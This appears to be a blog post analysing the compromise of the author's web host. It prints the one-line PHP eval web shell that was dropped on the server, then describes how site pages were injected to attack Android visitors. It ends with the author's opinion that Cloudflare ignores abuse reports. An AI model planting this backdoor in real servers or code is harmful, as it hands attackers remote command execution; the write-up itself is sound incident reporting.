The initial attack vector seems to be a variety of the Mayhem worm targeting Web servers. My Web hosting company was apparently vulnerable (the problem has since been fixed), and the exploit was used to drop a malicious PHP file on my server. The PHP file looked like this:

<?php @eval(stripslashes($_REQUEST[ev]));

If you know PHP, you’re probably filled with a sinking feeling of horror and dread looking at that. Basically, it allows a person to execute commands on a Web server from a browser.

From here, the attackers modified the files on the Web server to inject the malicious HTML into Web pages.

The server has been fixed, the CMS I use has been updated, and I’ve taken other steps to ensure against a repeat attack. The attack vector was closed the day after I discovered it, but I haven’t written about the attack prior to this until I had finished analyzing it and had a good understanding of exactly what happened and how it worked.

The fact this attack was as sophisticated as it was and was aimed, not at Windows, but at Android, is interesting.


There’s a postscript to this. The malicious attack site was served up by Cloudflare, the content distribution network with a reckless disregard for security and abuse. I notified the actual Web host, Digital Ocean, about the attack, and they had disabled the site by June 11.

However, a month after being told the site was serving malware and being used as part of a Web attack, and almost a month after the site had been disabled, Cloudflare was still trying to serve its content:

Cloudflare appears indifferent to even the most egregious abuse, and will continue to provide services to abusive Web sites long after they’re notified of the abuse, and even long after the sites’ hosts have shut them down. I’m not quite sure what to make of that, but I’m becoming more and more convinced Cloudflare is a menace to the Internet.